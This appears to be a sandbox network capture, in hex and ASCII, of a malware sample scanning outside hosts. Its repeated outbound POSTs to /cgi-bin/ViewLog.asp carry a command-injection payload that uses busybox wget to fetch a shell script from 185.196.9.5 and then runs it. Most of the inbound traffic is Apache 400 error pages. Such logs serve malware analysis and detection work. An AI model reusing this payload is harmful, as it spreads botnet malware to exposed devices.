Feb 25, 2024 19:03:57.563662052 CET	536	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:52 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></
Feb 25, 2024 19:03:59.772865057 CET	536	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:52 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></
Feb 25, 2024 19:04:01.983330965 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:52 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:06.399228096 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:52 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:15.246357918 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:52 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
571	192.168.2.15	33508	94.190.223.114	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:53.198477030 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
572	192.168.2.15	37970	31.136.165.141	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:55.737960100 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:58.949647903 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:05.093596935 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:17.125710011 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.469218016 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:31.620800018 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
573	192.168.2.15	54100	31.136.201.155	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:55.740145922 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:58.949635983 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:05.093595982 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:17.125581980 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:42.469213009 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:31.620663881 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
574	192.168.2.15	37426	95.182.234.169	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:55.742139101 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:55.932502031 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:55 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:56.412061930 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:55 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:03:57.034651041 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:55 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 